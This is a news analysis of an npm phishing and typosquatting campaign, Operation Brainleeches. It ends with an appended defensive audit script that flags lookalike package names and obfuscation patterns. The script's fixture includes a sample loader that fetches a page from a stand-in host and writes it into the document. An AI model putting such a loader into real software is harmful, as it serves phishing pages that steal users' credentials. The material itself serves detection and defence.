CSO Senior Writer

Malicious campaign uses npm packages to support phishing attacks

News Analysis
Jul 06, 2023
Malware, Open Source, Phishing

This newly discovered "dual use" campaign enables software supply chain compromise as well as phishing.

Researchers have identified yet another malicious use for JavaScript packages hosted on the npm registry: hosting files required by automated phishing kits or slipping phishing pages into applications that bundle the components. “The discovery may be the first ‘dual use’ campaign in which malicious open-source packages power both commodity phishing attacks and higher-end software supply chain compromises,” researchers from security firm ReversingLabs said in a new report.

In total, the researchers identified over a dozen packages that were part of this campaign, dubbed Operation Brainleeches. They were uploaded to the public npm registry between May 11 and June 13 using names that mimicked those of popular packages like jquery, react, and vue.js. The packages were downloaded around 1,000 times in total before they were discovered and removed.

Npm-hosted packages supporting phishing toolkits

The first batch of six packages, uploaded in May during the first stage of the operation, contained files that appear to have served as infrastructure for phishing kits. Two of these packages, standforusz and react-vuejs, contain the following files: DEMO.txt, jquery.js, jquery.min.js and package.json.

Based on the names alone these files would not attract suspicion because jquery.js and jquery.min.js are widely used files in JavaScript development and part of the jquery library. However, they caught the attention of the ReversingLabs researchers because their scans detected code obfuscation inside, which is unusual for open-source packages.

The same rogue jquery.js file was observed in the wild as a malicious attachment in email phishing attacks. When opened in a browser it fetched jquery.min.js from the jsDelivr content delivery network, which in turn opened a new HTML document and wrote to it dynamically. The script then fetched DEMO.txt from the same location and wrote its contents into the new document, so the victim ends up looking at a page that was never stored in the attachment itself.

DEMO.txt contains HTML code that mimics the login page for and sends any credentials entered in the form to a remote server. The researchers also found another phishing page targeting Microsoft 365 credentials by displaying what seems to be a blurred document in the background with a small Microsoft login pop-up in front.

Since the same files that were used in these phishing attacks were all found bundled in malicious npm packages, the assumption is that they’re likely part of some phishing kit whose deployment automation relies on npm. “Our open-source research uncovered both remnants of Operation Brainleeches as well as a very large number of similar email phishing attachments spawned by slightly different, but closely related phishing kits,” the ReversingLabs researchers said. “That suggests that the modules identified in phase 1 of the attack were likely not unique but part of a broader wave of attacks orchestrated by low level actors outfitted with powerful and automated tooling.”

Npm packages used to phish users of trojanized applications

The second phase of the attack involved a different set of packages, of which seven were identified, that behaved more in line with the supply-chain attacks seen on npm before. While most supply-chain attacks that rely on malicious npm packages target developers or development organizations that consume those packages in their projects, these packages were geared toward the end users of applications that happened to bundle them.

In essence, this was a typosquatting attack: the packages had names like jqueryoffline, vueofflinez and jquerydownloadnew, variations on popular frameworks and libraries. The attackers likely relied on developers accidentally incorporating these packages into their applications, and the package contents reflect that.

In addition to the files seen in phase 1, these packages included index.js and index.html, with index.js declared as the main file in the package.json metadata file. The researchers speculated that the goal was to target JavaScript applications built with tools like Webpack, which bundle JavaScript files into local applications that run inside a browser window; whatever a dependency declares as its entry point gets pulled into that bundle.

“For an application developer who is tricked into adding the jqueryoffline npm package as a dependency in lieu of the legitimate jquery package, Webpack will compile the necessary code and ensure that the content of the jqueryoffline index.js file, which is specified as the main inside jqueryoffline package.json file, ends up in the main.js file, which is the entry point of the Webpack bundled application,” the researchers said.

This means that an end user who downloads and runs an application trojanized in this manner will be shown fake Microsoft login pages that send the captured credentials to the attackers. This phase of the attack is similar to a different campaign that ReversingLabs detected last year and dubbed IconBurst, in which malicious npm packages were designed to steal sensitive information entered by users in forms displayed in mobile applications and websites.

When consuming packages from public repositories, software development organizations should watch for the telltale signs that a package might be suspicious: new packages with unusual name variations of well-known frameworks and libraries, low download counts, unusual dependencies, unusual versioning, in other words packages with a sketchy history. The use of code obfuscation inside packages should also be a big red flag. Note the distinction: a minified file such as jquery.min.js is expected in a library and only strips whitespace and shortens names, whereas obfuscation (hex-encoded identifiers and strings, code assembled at runtime and passed to eval) hides what the code does and has no place in an open-source package. It also pays to review the entry point each dependency declares in its package.json before it is bundled into anything shipped to end users.
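The kind of pre-bundling audit this advice calls for, as an added example that is not ReversingLabs' tooling or code from the article: it resolves each dependency's entry point the way a bundler does (the "main" field of package.json, falling back to index.js), compares the package name against a short list of popular names to catch typosquats like jqueryoffline, and counts obfuscation and document-rewriting indicators in the entry file. The two packages, the POPULAR list, the regexes and the URL are constructed samples for the demonstration, not the real Operation Brainleeches files.

```javascript
// Added example (not ReversingLabs' or CSO's code): an offline audit of npm
// dependency entry points for the red flags discussed in the article. Package
// contents below are constructed in-memory samples, not real registry data.

// Names a typosquat would imitate (assumed shortlist; extend for your own stack).
const POPULAR = ["jquery", "react", "vue", "lodash", "axios"];

// Levenshtein edit distance, used to catch one- or two-character name variations.
function editDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, (_, i) => [i]);
  for (let j = 1; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost);
    }
  }
  return d[a.length][b.length];
}

// Returns the popular package a name looks like (prefix/suffix padding such as
// "jqueryoffline", or a near-miss spelling), or null for exact or unrelated names.
function typosquatOf(name) {
  const n = name.toLowerCase();
  if (POPULAR.includes(n)) return null; // the real thing
  for (const p of POPULAR) {
    if (n.startsWith(p) || n.endsWith(p) || editDistance(n, p) <= 2) return p;
  }
  return null;
}

// Patterns common in obfuscated JavaScript. Minified code matches none of these.
const OBFUSCATION_PATTERNS = {
  hexIdentifiers: /_0x[0-9a-f]{4,}/g,            // javascript-obfuscator style names
  hexEscapes: /\\x[0-9a-f]{2}/g,                 // strings written as \x44\x45...
  dynamicEval: /\b(eval|Function)\s*\(/g,        // code assembled at runtime
  charCodeDecoding: /String\.fromCharCode|atob\s*\(/g,
};

// Loader behaviour described in the article: rewrite the document with content
// fetched from a remote text file.
const LOADER_PATTERNS = {
  documentRewrite: /document\.(write|open)\s*\(/g,
  remoteTextFetch: /https?:\/\/[^\s"']+\.txt\b/g,
};

function countMatches(src, re) {
  return (src.match(re) || []).length;
}

// The file a bundler pulls in for require("<name>"): "main", else index.js.
function resolveEntry(pkg) {
  return pkg.packageJson.main || "index.js";
}

// Audits one in-memory package: { name, packageJson, files: { path: contents } }.
function auditPackage(pkg) {
  const findings = [];
  const lookalike = typosquatOf(pkg.name);
  if (lookalike) findings.push(`name "${pkg.name}" resembles popular package "${lookalike}"`);
  const entry = resolveEntry(pkg);
  const src = pkg.files[entry];
  if (src === undefined) {
    findings.push(`entry point ${entry} is missing from the package`);
    return { name: pkg.name, entry, findings };
  }
  for (const [label, re] of Object.entries(OBFUSCATION_PATTERNS)) {
    const n = countMatches(src, re);
    if (n > 0) findings.push(`${entry}: ${n} ${label} hit(s)`);
  }
  const rewrites = countMatches(src, LOADER_PATTERNS.documentRewrite);
  const remote = countMatches(src, LOADER_PATTERNS.remoteTextFetch);
  if (rewrites > 0 && remote > 0) {
    findings.push(`${entry}: rewrites the document with content fetched from a remote .txt`);
  }
  return { name: pkg.name, entry, findings };
}

// Constructed sample: a benign, minified-looking library stub.
const benignPackage = {
  name: "jquery",
  packageJson: { name: "jquery", version: "3.7.0", main: "dist/jquery.js" },
  files: { "dist/jquery.js": "(function(w){function $(s){return w.document.querySelectorAll(s)}w.$=$})(window);" },
};

// Constructed sample imitating the described loader: a typosquat whose entry point
// fetches a remote text file and writes it into a freshly opened document.
const lookalikePackage = {
  name: "jqueryoffline",
  packageJson: { name: "jqueryoffline", version: "1.0.0", main: "index.js" },
  files: {
    "index.js":
      'var _0x3a1f=["\\x44\\x45\\x4d\\x4f"];' +
      'fetch("https://cdn.example.invalid/kit/DEMO.txt").then(function(r){return r.text()})' +
      '.then(function(t){document.open();document.write(t);document.close();});',
    "index.html": "<html></html>",
  },
};

for (const pkg of [benignPackage, lookalikePackage]) {
  console.log(JSON.stringify(auditPackage(pkg), null, 2));
}
```

In a real pipeline the two sample objects would be replaced by a walk over node_modules (reading each package.json and the file it names as main) and the result gated in CI before the bundler runs. The name check is deliberately crude: legitimate ecosystem packages such as vue-router also start with a popular name, so keep an allowlist of known-good names alongside the POPULAR list.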